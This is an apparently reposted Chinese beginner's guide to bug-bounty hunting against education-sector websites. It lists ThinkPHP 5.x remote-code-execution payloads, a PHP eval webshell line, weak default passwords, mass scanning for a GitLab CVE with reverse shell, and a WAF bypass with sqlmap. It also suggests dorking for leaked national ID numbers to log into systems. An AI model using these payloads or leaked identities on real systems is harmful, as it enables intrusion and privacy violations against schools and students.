【技术好文】小白快速入门SRC挖掘（src挖掘经验）

【技术好文】小白快速入门SRC挖掘（src挖掘经验）

文章首发SecIN; 作者：雨落新痕

现阶段，教育行业漏洞报告平台接收如下类别单位漏洞：

教育部 各省、自治区教育厅、直辖市教委、各级教育局 学校 教育相关软件

0x01 信息搜集

收集到别人收集不到的资产，就能挖到别人挖不到的洞。

网络空间测绘

奇安信的鹰图：

表示搜索以edu.cn为结尾的资产，ip.isp="教育"，表示搜索教育网段的资产，后者的搜索规模是比前者大很多。

子域名搜集

在线的子域名搜集网站，灰常好用:

site:xxx.edu 身份证

有时候运气好就可以搜集到泄露的身份证信息，+1rank(从来没遇到过)

如果能用这种方法搜集到对应的学号身份证，就可以进系统测试了！或者直接连上vpn进内网上fscan扫描（这里的话可以通过上面说的搜集到的子域名去获得对应的内网ip地址。

指纹识别

C端与旁站信息

这里我使用这个工具api接口发现

推荐使用jsfind和packer-fuzzer，均可以在github下载

0x02 一些思路

废话不多说了

先说一下我感受的挖洞难度：证书大学站> 资产多的普通大学 > 资产多的职业学院 > 有账号密码能进内网

所以我一开始是去找那种职业学院打的，大概是排行榜50多页的学校，可以用鹰图title="xxxx"进行搜集

因为一些带专网站的安全意识比较差，所以有时候能遇到那种弱口令进后台文件上传拿shell的，关于弱口令：用户名一般是admin ，密码一般是123456，admin，888888 三选一，不是的话可以撤退了

弱口令真的yyds

除了弱口令

然后说一下其他思路

比如说think5未开强制路由RCE，debug rce,这种网站很多大学都存在，但是寻找thinkphp符和条件的网站却很难，一种利用鹰图就是搜索默认图标hash值来寻找，但是这种估计很难捡到，但是在闲逛的过程中看到路由规则类似thinkphp的可以尝试一下

一些payload

5.1.x:

?s=index/\think\Request/input&filter[]=system&data=pwd ?s=index/\think\view\driver\Php/display&content= ?s=index/\think\template\driver\file/write&cacheFile=shell.php&content= ?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id ?s=index/\think\app/invoke: ```bash ?s=index/think\config/get&name=database.username # 获取配置信息 ?s=index/\think\Lang/load&file=../../test.jpg # 包含任意文件 ?s=index/\think\Config/load&file=../../t.php # 包含任意.php文件 ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

写入shell

@eval($_REQUEST[cmd]);?>

然后，讲一下我一些思路，使用一些Nday来快速上分，或者挖掘逻辑漏洞实现通杀 关于Nday这里举俩个例子大家自行体会

比如说你知道有一个cve,比方说这个gitlab的cve：gitlab-CVE-2021-22205，gitlab显而易见的是很多高校都有这个gitlab的托管网站。

所以说我们只要把所有gitlab edu上的资产全部搜集过来然后利用脚本一一检测就可以了

这里说一下怎么搜集的

先从图标下手，限定edu域名：可以看到有17条资产

限定ip有27条资产

去除图标的有45条资产

把数据全部导出收集到一起，利用github上的脚本进行检测，这样就捡到俩个洞，因为gitlab这个cve是可以反弹shell的，所以12rank到手

再说一个比如说springboot未授权访问漏洞：

同上一样的方法：直接搜java白页，把数据导出->脚本检测

因为范围足够大所以也能有不小收获

逻辑漏洞

这里可以使用jsfind脚本去寻找一些js接口，可能会有未授权文件上传，ssrf等等，或者在登录抓取返回包把false改成true，去实现登录绕过

sql注入

寻找注入点方法：site:edu.cn inurl:xxx.php|jsp|asp?xxx= xxx可以自己发挥想象 ，或者在一些老系统登录，支付平台上都有可能存在注入

但是sql注入大多学校都上了waf，绕过waf不容易

这里举一个绕安全狗的例子：

这里原本的参数是a和b，但是a，b参数的输入会被waf检测，通过拦截可以看出是常见的安全狗waf，所以这里可以多添加俩个参数：aa，bb（后端不会接收这两个参数，但是安全狗不会检测注释里的内容，这样就简单绕过了），使用sqlmap轻松拿下。

sqlmap -u "/" -p "b" --random-agent

加入社群

版权声明：本文内容由网络用户投稿，版权归原作者所有，本站不拥有其著作权，亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容，请联系我们jiasou666@gmail.com 处理，核实后本网站将在24小时内删除侵权内容。